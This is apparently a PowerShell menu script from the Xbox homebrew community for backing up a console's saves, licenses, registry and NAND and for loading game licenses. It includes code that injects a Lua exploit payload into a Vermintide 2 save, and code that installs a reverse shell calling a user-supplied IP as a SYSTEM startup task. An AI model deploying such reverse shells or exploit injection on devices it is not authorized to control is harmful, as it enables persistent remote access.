﻿# Script made by RolyPoly and Derf v0.3

# Customize these variables to your environment
$RemovableDriveLetter = "D:"
$ClipDriveLetter = "S:"
$debug = $true

###############################################

# Set DOTNET_ROOT if not already set
if (-not $env:DOTNET_ROOT) {
    $env:DOTNET_ROOT = Join-Path -Path $RemovableDriveLetter -ChildPath "dotnet"
}

$xbdiagcapRan = $false
$env:DOTNET_CLI_TELEMETRY_OPTOUT = "1"  # Disable .NET telemetry
$env:DOTNET_EnableWriteXorExecute = "0" # Prevent .NET CLR errors
$env:PATH += ";$env:DOTNET_ROOT"        # Add .NET SDK folder to PATH
[console]::InputEncoding = [console]::OutputEncoding = [System.Text.UTF8Encoding]::new() # Prevent allow piping cmd to $null

function Show-MainMenu {
    Write-Host "`n"
    Write-Host " ================= Run Menu ==================`n"
    if (Storage-Mounted) {
    Write-Host " 1) Unmount Storage                                  Special thanks to"
    }
    else {
    Write-Host " 1) Mount Storage                                    Special thanks to"
    }
    Write-Host " 2) Backup Saves        to $RemovableDriveLetter\xb1                    ~~~~~~~~~~~~~~~~~~"
    Write-Host " 3) Backup Licenses     to $RemovableDriveLetter\Licenses               Xbox-Scene Discord"
    Write-Host " 4) Backup Registry     to $RemovableDriveLetter\regdump                Xbox One Research"
    Write-Host " 5) Backup NAND (XBFS)  to $RemovableDriveLetter\flashdump.bin          ConsoleMods.org"
    Write-Host " 6) Backup LicenseState to $RemovableDriveLetter\LicenseState.txt       invoxiplaygames"
    Write-Host "                                                     burninrubber0"
    Write-Host " ----------{ Dumping }----------                     lllsondowlll"
    Write-Host "                                                     carrot-c4k3"
    Write-Host " 7) Load Xbox One / Series Digital License           Helloyunho"
    Write-Host " 8) Load Xbox One / Series Disc License              Landcross"
    Write-Host " 9) Load Original Xbox / Xbox 360 Disc License       landaire"
    Write-Host "                                                     RolyPoly"
    Write-Host " ----------{ Special }----------                     tuxuser"
    Write-Host "                                                     LukeFZ"
    Write-Host " I) Inject Stage1.lua into Vermintide 2 Save         Exzedo"
    Write-Host " B) Run all Backup Options                           Derf"
    if ((schtasks /query /tn "DAShell" 2> $null) -eq $null) {
    Write-Host " S) Start Background Reverse Shell                   Ox"
    Write-Host " U) Upgrade GS Reverse Shell `"Remote`" to `"Local`""
    }
    else {
    Write-Host " S) Stop Background Reverse Shell                    Ox"
    }
    Write-Host " Q) Quit                                             "
    Write-Host "`n`n`n`n`n`n Selection: " -NoNewline
    
    switch (Read-Host) {
        "1" { Mount-Storage }
        "2" { Dump-Saves }
        "3" { Backup-Licenses }
        "4" { Regdump }
        "5" { XBFS }
        "6" { Run-XBdiagCap }
        "7" { LicenseLoader $true }
        "8" { XboxOneDisc }
        "9" { LicenseLoader $false }
        "I" { Inject-Stage1 } 
        "B" { Dump-Saves;Backup-Licenses;Regdump;XBFS;Run-XBdiagCap }
        "S" { Background-Shell }
        "U" { Upgrade-Remote-Shell }
        "Q" { exit }
        "D" { $debug = $true }
        default { Show-MainMenu }
    }
}

function Storage-Mounted {
    Test-Path "T:\connectedStorage\"
}

function Mount-Storage {
    if (Storage-Mounted) {
        Write-Host "Unmounting Storage...`n"
        $junction = Get-Item -Path "T:\connectedStorage"
        $junction.Delete()
        Write-Host "Storage unmounted successfully."
        return
    }

    Write-Host "Mounting Storage...`n"

    if (-not (Test-Path "$env:DOTNET_ROOT\dotnet.exe")) {
        Write-Host "dotnet.exe not found. Please install the .NET 6 SDK."
        return
    }

    if (-not (Test-Path "$RemovableDriveLetter\mount_connectedstorage.xml")) {
        Write-Host "mount_connectedstorage.xml not found. Please ensure it is in the current directory."
        return
    }

    $result = & "$env:DOTNET_ROOT\dotnet.exe" msbuild "$RemovableDriveLetter\mount_connectedstorage.xml"
    $harddiskNumber = $result[-1].Split("Harddisk")[1].Split('\')[0]

    cmd /c "mklink /j T:\connectedStorage \\?\GLOBALROOT\Device\Harddisk$harddiskNumber\Partition1\"
    Write-Host "Storage mounted successfully."
}

function Backup-Licenses {
    Write-Host "Backing Up Licenses..."
    if (-not (Test-Path "$RemovableDriveLetter\Licenses")) {
        New-Item -Path "$RemovableDriveLetter\Licenses" -ItemType Directory
    }
    if (Test-Path "$ClipDriveLetter\clip\*.*") {
        Get-ChildItem -Path $ClipDriveLetter\clip | ForEach-Object {
            try {
                Copy-Item -Path $_.FullName -Destination $RemovableDriveLetter\Licenses -ErrorAction Stop
            }
            catch {
                Write-Host "Skipping file in use: $($_.Name)"
            }
        }
    }
    else {
        Write-Host "No licenses found to back up."
    }
}

function Dump-Saves {
    if (!(Storage-Mounted)) {Mount-Storage}
    if (!(Storage-Mounted)) {return}

    Write-Host "Dumping Saves (Credit to burninrubber0 on Discord)...`n"

    if (-not (Test-Path "$RemovableDriveLetter\xb1\saves")) {
        New-Item -Path "$RemovableDriveLetter\xb1\saves" -ItemType Directory
    }

    Get-ChildItem -Directory -Recurse "T:\connectedstorage" | ForEach-Object {
        New-Item -Path "$RemovableDriveLetter\xb1\saves\$($_.FullName.Substring(3))" -ItemType Directory -Force
    }

    Get-ChildItem -Recurse "T:\connectedstorage" | ForEach-Object {
        Copy-Item -Path $_.FullName -Destination "$RemovableDriveLetter\xb1\saves\$($_.FullName.Substring(3))" -Force
    }
    Write-Host "Saves dumped successfully."
}

function Regdump {
    Write-Host "Backing up registry to USB:\Regdump`n"

    if (-not (Test-Path "$env:DOTNET_ROOT\dotnet.exe")) {
        Write-Host "dotnet.exe not found. Please install the .NET 6 SDK."
        return
    }

    if (-not (Test-Path "$RemovableDriveLetter\registry_dump.xml")) {
        Write-Host "registry_dump.xml not found. Please ensure it is in the current directory."
        return
    }

    & "$env:DOTNET_ROOT\dotnet.exe" msbuild "$RemovableDriveLetter\registry_dump.xml"
    Write-Host "Performed successful backup of registry."
}

function XBFS {
    Write-Host "Backing up XBFS`n"

    if (-not (Test-Path "$env:DOTNET_ROOT\dotnet.exe")) {
        Write-Host "dotnet.exe not found. Please install the .NET 6 SDK."
        return
    }

    if (-not (Test-Path "$RemovableDriveLetter\xbfs_backup.xml")) {
        Write-Host "xbfs_backup.xml not found. Please ensure it is in the current directory."
        return
    }

    & "$env:DOTNET_ROOT\dotnet.exe" msbuild "$RemovableDriveLetter\xbfs_backup.xml"
    Write-Host "Performed successful backup of XBFS."
}

function Run-XBdiagCap {
    xbdiagcap
    Write-Host "Press Enter to continue" # xbdiagcap has weird behavior if you try and copy the file without a blocking command in-between
    Read-Host
    Copy-Item -Path "T:\Windows\Temp\xbdiag_capture\LicenseState.txt" -Destination "$RemovableDriveLetter\LicenseState.txt" -Force
    Write-Host "LicenseState.txt copied to $RemovableDriveLetter\"
}

function Inject-Stage1 {
    if (!(Storage-Mounted)) {Mount-Storage; $unmountWhenDone = $true}
    if (!(Storage-Mounted)) {return}

    Write-Host "Injecting Stage1.lua into Vermintide save..."
    $targetDirPattern = "*_C05F0100-EAC5-49EB-943F-1A0E3C108361"
    $luaFilePath = "$RemovableDriveLetter\LuaFFI-CE\stage1.lua"
    $filesToReplace = Get-ChildItem -Path "T:\connectedStorage" -Directory | Where-Object { $_.Name -like $targetDirPattern } | Get-ChildItem -Directory | Get-ChildItem -File | Where-Object { $_.Name -NotLike "*container*" }
    
    if (!$filesToReplace) {
        Write-Host "Could not find Vermintide save. Have you launched the game and pressed A?"
        exit
    }

    $luaContents = Get-Content -Path $luaFilePath -Raw
    if (!$luaContents) {
        Write-Host "Could not find $RemovableDriveLetter\LuaFFI-CE\Stage1.lua"
        exit
    }

    Write-Host "Please enter your PC's IP address ['q' to quit]:"
    $userIP = Read-Host
    if (!$userIP -or $userIP -eq "q") {
        exit
    }

    Write-Host "Please enter port to use [default: 8123]:"
    $userPort = Read-Host
    if (!$userPort) {
        $userPort = "8123";
    }

    $ipPattern = 'local\s+serverIp\s*=\s*"([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"'
    $portPattern = 'local\s+serverPort\s*=\s*([0-9]+)'
    $luaContents = $luaContents -replace $ipPattern, "local serverIp = `"$userIP`" -- Change this to your server's IP address"
    $luaContents = $luaContents -replace $portPattern, "local serverPort = $userPort -- Change this to your server's port"
    Write-Host "Modifying to target $userIP..."

    foreach ($file in $filesToReplace) {
        Set-Content -Path $file.FullName -Value $luaContents
        Write-Host "Replaced contents of $($file.FullName) with new content."
    }

    if ($unmountWhenDone) {
        Mount-Storage
    }

    Write-Host "Operation completed successfully."
}

function LicenseLoader {
    param ([bool]$digitalDump)

    # Option 6 will not copy the file properly, this is a work around to use the latest LicenseState.txt
    $tLicenseState = "T:\Windows\Temp\xbdiag_capture\LicenseState.txt"
    $dLicenseState = "$RemovableDriveLetter\LicenseState.txt"
    if ((Test-Path $tLicenseState) -and (Test-Path $dLicenseState)) {
        $cLastModified = (Get-Item $tLicenseState).LastWriteTime
        $dLastModified = (Get-Item $dLicenseState).LastWriteTime
        if ($cLastModified -gt $dLastModified) {
            Copy-Item -Path $tLicenseState -Destination $dLicenseState -Force
        }
    }

    $licenseStateContent = Get-Content -Path "$RemovableDriveLetter\LicenseState.txt"
    if (!$licenseStateContent) {
        Write-Host "Run Option 6 and then run this option again"
    }
    $licensedPackages = @()
    $licensedPackagesFriendly = @()
    $packageDetails = @{}
    $currentPackage = $null
    foreach ($line in $licenseStateContent) {
        if ($line -match '^\s+([a-zA-Z0-9._-]+):$') {
            $currentPackage = $matches[1]
            $licensedPackages += $currentPackage
            $licensedPackagesFriendly += $currentPackage
            $packageDetails[$currentPackage] = @{
                PID = $null
                CID = $null
                EKB = $null
            }
        }
        elseif ($currentPackage -ne $null) {
            if ($line -match 'PID:\s+([a-zA-Z0-9-]+)') {
                $packageDetails[$currentPackage].PID = $matches[1]
            }
            elseif ($line -match 'CID:\s+([a-zA-Z0-9-]+)') {
                $packageDetails[$currentPackage].CID = $matches[1]
            }
            elseif ($line -match 'EKB:\s+([a-zA-Z0-9-]+)') {
                $packageDetails[$currentPackage].EKB = $matches[1]
            }
        }
    }

    # Lookup friendly name
    $lookupTableContent = Import-Csv -Path "$RemovableDriveLetter\TitleLookup.csv"
    $cidLookup = @{}
    $pidLookup = @{}

    foreach ($entry in $lookupTableContent) {
        $cidLookup[$entry.CID] = $entry.ProductTitle
        $pidLookup[$entry.PID] = $entry.ProductTitle
    }

    for ($i = 0; $i -lt $licensedPackages.Count; $i++) {
        # Lookup by CID
        $cidValue = $packageDetails[$licensedPackages[$i]].CID
        if ($cidLookup.ContainsKey($cidValue)) {
            $licensedPackagesFriendly[$i] = $cidLookup[$cidValue]
        }
        else {
            # Failsafe lookup via PID
            $pidValue = $packageDetails[$licensedPackages[$i]].PID
            if ($pidValue -AND $pidLookup.ContainsKey($pidValue)) {
                $licensedPackagesFriendly[$i] = $pidLookup[$pidValue]
            }
        }
    }

    if ($licensedPackages.Count -eq 0) {
        Write-Host "No licensed packages found."
        exit
    }

    Write-Host "`n======================================="
    Write-Host "========= Available Licenses =========="
    Write-Host "======================================="
    for ($i = 0; $i -lt $licensedPackages.Count; $i++) {
        Write-Host "[$($i + 1)] $($licensedPackagesFriendly[$i])"
    }

    Write-Host "`nPlease enter the number of the package you want to select ['q' to quit]:"
    $userChoiceRaw = Read-Host
    if ($userChoiceRaw -eq "q") {exit}
    $userChoice = [int]$userChoiceRaw

    if ($userChoice -match '^\d+$' -and $userChoice -gt 0 -and $userChoice -le $licensedPackages.Count) {
        $selectedPackage = $licensedPackages[$userChoice - 1]
        Write-Host "`nYou selected: $($licensedPackagesFriendly[$userChoice - 1])`n"
        $details = $packageDetails[$selectedPackage]
        if ($debug) {Write-Host "PID: $($details.PID)"}
        if ($debug) {Write-Host "CID: $($details.CID)"}
        if ($debug) {Write-Host "EKB: $($details.EKB)"}

        if ($digitalDump) {
            $keyToSearch = $details.EKB
            foreach ($line in $licenseStateContent) {
                if ($line -match "\[key:$keyToSearch\s") {
                    if ($line -match '^  License\s([a-f0-9-]+)\s') {
                        if ($debug) {Write-Host "License ID: $($matches[1])"}
                        $licensePath = "S:\Clip\$($matches[1])"
                    } else {
                        Write-Host "Could not extract license name"
                    }
                }
            }
        }
        else {
            $csvFilePath = "$RemovableDriveLetter\BC Licenses\!EKB Mapping.csv"
            if (Test-Path $csvFilePath) {
                $csvContent = Import-Csv -Path $csvFilePath
                $matchingEntry = $csvContent | Where-Object { $_.EKB -eq $details.EKB } | Select-Object -First 1

                if ($matchingEntry) {
                    if ($debug) {Write-Host "License ID: $($matchingEntry.LicenseID)"}
                } else {
                    Write-Host "No matching LicenseID found for EKB: $($details.EKB)"
                }
            } else {
                Write-Host "The CSV file '$csvFilePath' does not exist."
            }
            $licensePath = "$RemovableDriveLetter\BC Licenses\$($matchingEntry.LicenseID).xml"
        }
    } else {
        Write-Host "Invalid choice. Please run the script again and enter a valid number."
    }
    
    if ($licensePath) {
        if ($debug) {Write-Host $licensePath}
        Add-Type -Path $RemovableDriveLetter\license.cs
        $exit = $false
        while (!$exit) {
            Write-Host "Loading license..." -NoNewline
            try {
                if([LicenseManager]::LoadLicenseFile("$licensePath")) {
                    Write-Host " success!"
                    Write-Host "Content ID: $($details.CID)"
                }
                else {
                    Write-Host " failed."
                }
                $exit = $true
            }
            catch {
                Write-Host " failed."
                Write-Host "Insert disc and try again (y/n)?"
                $response = Read-Host
                if ($response -eq "n") {
                    $exit = $true
                }
            }
        }
    }
    else {
        Write-Host "No matching key found for: $keyToSearch"
    }
}

function XboxOneDisc {
    $content = Get-Content -Path "O:\MSXC\Metadata\catalog.js" -Encoding String
    $contentId = [regex]::Match($content, '"contentId":"([a-z0-9\-]*)"').Groups[1].Value
    $licensepath = Get-ChildItem -Path "O:\Licenses\*" -Recurse | Select-Object -First 1
    if ($debug) {Write-Host "License file path: $licensepath"}

    if ($licensepath) {
        Write-Host "`nLoading license..." -NoNewline
        Add-Type -Path $RemovableDriveLetter\license.cs
        if([LicenseManager]::LoadLicenseFile("$licensepath")) {
            Write-Host " success!"
        }
        else {
            Write-Host " failed."
        }
    }
    Write-Host "Content ID: $contentId"
}

Function Background-Shell {
    if ((schtasks /query /tn "DAShell" 2> $null) -ne $null) {
        schtasks /end /tn "DAShell"
        schtasks /delete /tn "DAShell" /F
        return
    }
    $revshell_path = "$RemovableDriveLetter\revshell3.xml"
    $revshellxml = Get-Content -Path $revshell_path -Raw
    if (!$revshellxml) {
        Write-Host "Could not find $revshell_path"
        exit
    }

    Write-Host "Please enter your PC's IP address ['q' to quit]:"
    $userIP = Read-Host
    if (!$userIP -or $userIP -eq "q") {
        exit
    }

    Write-Host "Please enter port to use [default: 1337]:"
    $userPort = Read-Host
    if (!$userPort) {
        $userPort = "1337";
    }

    $pattern = 'TcpClient\s*\(\s*"\d{1,3}(\.\d{1,3}){3}"\s*,\s*\d+\s*\)'
    $revshellxml = $revshellxml -replace $pattern, "TcpClient(`"$userIP`", $userPort)"
    Set-Content -Path $revshell_path -Value $revshellxml
    Write-Host "Updated contents of $revshell_path"
        
    schtasks /create /f /tn "DAShell" /ru SYSTEM /sc ONSTART /tr "$RemovableDriveLetter\dotnet\dotnet.exe build $RemovableDriveLetter\revshell3.xml"
    schtasks /run /tn "DAShell"
    Write-Host "`nBackground reverse shell will now try to connect to $($userIP):$($userPort)"
    Write-Host "Once connected, you can close Game Script"
}

Function Upgrade-Remote-Shell {
    $gamescript_autosave_path = "$RemovableDriveLetter\collateral_damage_v1\gamescript_autosave.txt"
    $localshellxml = Get-Content -Path $gamescript_autosave_path -Raw
    if (!$localshellxml) {
        Write-Host "Could not find $gamescript_autosave_path"
        exit
    }

    Write-Host "Please enter your PC's IP address ['q' to quit]:"
    $userIP = Read-Host
    if (!$userIP -or $userIP -eq "q") {
        exit
    }

    $ipPattern = 'var\s+host_ip\s*=\s*"([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"'
    $localshellxml = $localshellxml -replace $ipPattern, "var host_ip = `"$userIP`""
    Set-Content -Path $gamescript_autosave_path -Value $localshellxml
    Write-Host "Updated contents of $gamescript_autosave_path"
    Write-Host "Copying Local Shell files..."
    $localProfilePath = [System.Environment]::GetFolderPath('LocalApplicationData')
    $destinationPath = Join-Path -Path $localProfilePath -ChildPath "Packages\27878ConstantineTarasenko.458004FD2C47C_c8b3w9r5va522\LocalState\"
    Copy-Item -Path "$RemovableDriveLetter\collateral_damage_v1\gamescript_autosave.txt" -Destination $destinationPath -Force
    Copy-Item -Path "$RemovableDriveLetter\collateral_damage_v1\stage2.bin" -Destination $destinationPath -Force -ErrorAction SilentlyContinue
    Write-Host "Your Game Script reverse shell has been upgraded."
    Write-Host "`nUse `"gamescript_reverse_shell.bat`" from now on before running Game Script."
    Write-Host "Please close and re-open Game Script now."
}

# Main Loop
while ($true) {
    Show-MainMenu
    Write-Host "`nPress Enter to return to menu"
    Read-Host
}
